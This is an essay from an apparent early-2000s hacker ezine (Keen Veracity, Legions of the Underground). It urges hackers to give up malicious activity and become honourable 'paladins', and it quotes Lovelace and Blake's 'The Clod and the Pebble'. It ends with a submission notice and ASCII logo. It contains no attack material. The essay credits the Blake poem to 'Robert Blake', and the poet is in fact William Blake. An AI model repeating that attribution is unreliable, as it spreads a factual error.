Our minds ought to be occupied by higher things; with love rather than consuming hatred; justice for the poor rather than concern over our own finances, and with how much *we* are making. Think about it: in the underground as it stands, how many of us are devoured by our lusts for vice, and our love of perversion? Most hackers I know would rather download porn than music, and would rather curse one another than say anything worthwhile. We complain that the world has no respect for us; what have we done to deserve it? We claim in magazines that we're the 'elite', that we represent a new order to things. From this humble writer's perspective, it only seems we're a new wrinkle on an old, old face. Other than malicious pranks, we as a people haven't made any sort of significant impact on the world, other than to be a handy boogeyman for government military types and law enforcement to justify increasing their budgets with.

If you're a hacker currently engaging in dark enterprises, consider! The consequences of your action don't just extend to yourself (getting caught) but extend to every hacker in the world. For every one of us engaged in evil, the honorable name of "hacker" grows a little dimmer every time. Already the word "virtue" to the underground as a whole is a flickering candle, soon to be gutted. Do you want it said that you were the final puff of wind that blew it out? Turn your ways. Accept your duty. Learn to do good, and combat evil. For every hacker engaged in the good, our name grows a little brighter, and the dream of an underground concerned with worthwhile, honorable endeavors draws a bit nearer.

Many government officials will not understand you, should you turn your ways. Good or evil, they will see only a computer hacker, born and bred to spread chaos. As I said in "Hacker Paladins"; though they will persecute you, do not strike maliciously at sworn agents of justice. We fight, them and us, on the same side: to protect the masses, and guard them from those who would exploit and perform savagery. The proper attitude for a paladin to take regarding persecution is found in the poetry of Richard Lovelace:

"Stone walls do not a prison make
Nor iron bars a cage;
Minds quiet and innocent take
That for a hermitage;
If I have freedom in my love
And in my soul am free
Angels alone, that soar above,
Enjoy such liberty."
-"To Althea, In Prison"

We are free in many ways; free to love whomever we choose, free to follow our faith; free to hope in a better world to come. Yet there are so many ways in which we are not free: we are not free from our lusts, our sick desires, and our despair in our own inherent dark hearts. How can we shun this bane, and learn to walk as we ought? By being servants of the High, rather than the lords of destruction that the world sees us as. Better a servant in Heaven than a lord of Hell.

What type of love should paladins practice? To answer this, we turn to examining the Romantic-era Christian mystic Robert Blake:

"Love seeketh not itself to please
Nor for itself hath any care,
But for another gives its ease,
And builds a Heaven in Hell's despair."
So sung a little clod of clay,
Trodden with the cattle's feet,
But a pebble of the brook
Warbled out these meters meet:
"Love seeketh only self to please
To bind another to its delight
Joys in another's loss of ease,
And builds a Hell in Heaven's despite."

The two philosophies contained in the poem (the clay's self-sacrifice, humility and compassion contrasted with the pebble's hatred, sadism, selfishness and pride) are the two forces battling in the underground. Most hackers become such not out of any joy they gain in technical knowledge, but craving the respect they feel they'll get from wreaking havoc on innocents. Even when confronted with the damage they cause, most darksider hackers look at you blankly, and ask in bewilderment what this has to do with them, and can you please step away from their keyboard? This is stupidity, and a total lack of empathy. Many others enjoy using their skills to deliberately hurt people; not for a political cause, not for any real reason, but simply because they can. It is against this element that a small force of virtuous, honorable men will arise in every generation, in every sub-culture, to combat and withstand. It is the clay's philosophy that Zarcadians must always strive to keep close, and the pebble's philosophy which we must forever fight against.

Until next we meet, brothers and sisters, God bless.

-Raschid
*Founder of Warzael Zarcae
**You can contact Raschid at cogitoesum@yahoo.com; read Zarcae's works at www.hackedarchives.com, or come join us in #zarcae on undernet on IRC!**

--------------------------------------------------------------------------------
S U B M I T   T O   K E E N   V E R A C I T Y
--------------------------------------------------------------------------------

NO! You do not have to be a member of Legions of the Underground to submit to KV. You can be a member of something else! Nobody is perfect! If you have an idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudiced in any way, shape or form, so even an AOLer's article may be published if it seems that it has clue. Or then again, maybe hell will freeze over! Anyone's stuff may be published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is an equal opportunity destroyer.
-------------------------------------------------------------------------------- All submissions to: submit@legions.org -------------------------------------------------------------------------------- IRC: Undernet #legions MUD: Sensenet.legions.org 5555 - The Best in Star Wars Reality Mudding -------------------------------------------------------------------------------- O F T E N I M I T A T E D N E V E R D U P L I C A T E D -------------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D n :. E% ___ _______ ___ ___ :"5 z % | | (_______) | | | | :" ` K ": | | | | | | | | | | z R ? %. | | | | | | | | | | :^ J ". ^s | |___ | |___| | | |___| | f :~ '+. #L |_____| \_____/ \_____/ z" .* '+ %L z" .~ ": '%. .# + ": ^%. .#` +" #: "n .+` .z" #: ": www.legions.org z` +" %: `*L z" z" *: ^*L z* .+" "s ^*L z# .*" #s ^%L z# .*" #s ^%L z# .r" #s ^%. u# .r" #i '%. u# .@" #s ^%u# .@" #s x# .*" x#` .@%. x#` .d" "%. xf~ .r" #s "%. u x*` .r" #s "%. x. %Mu*` x*" #m. "%zX" :R(h x* "h..*dN. u@NM5e#> 7?dMRMh. z$@M@$#"#" *""*@MM$hL u@@MM8* "*$M@Mh. z$RRM8F" [knowledge is key] "N8@M$bL 5`RM$# 'R88f)R 'h.$" #$x* -------------------------------------------------------------------------------- All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity, copyright (c) 2000-2001 legions.org, all rights reserved. --------------------------------------------------------------------------------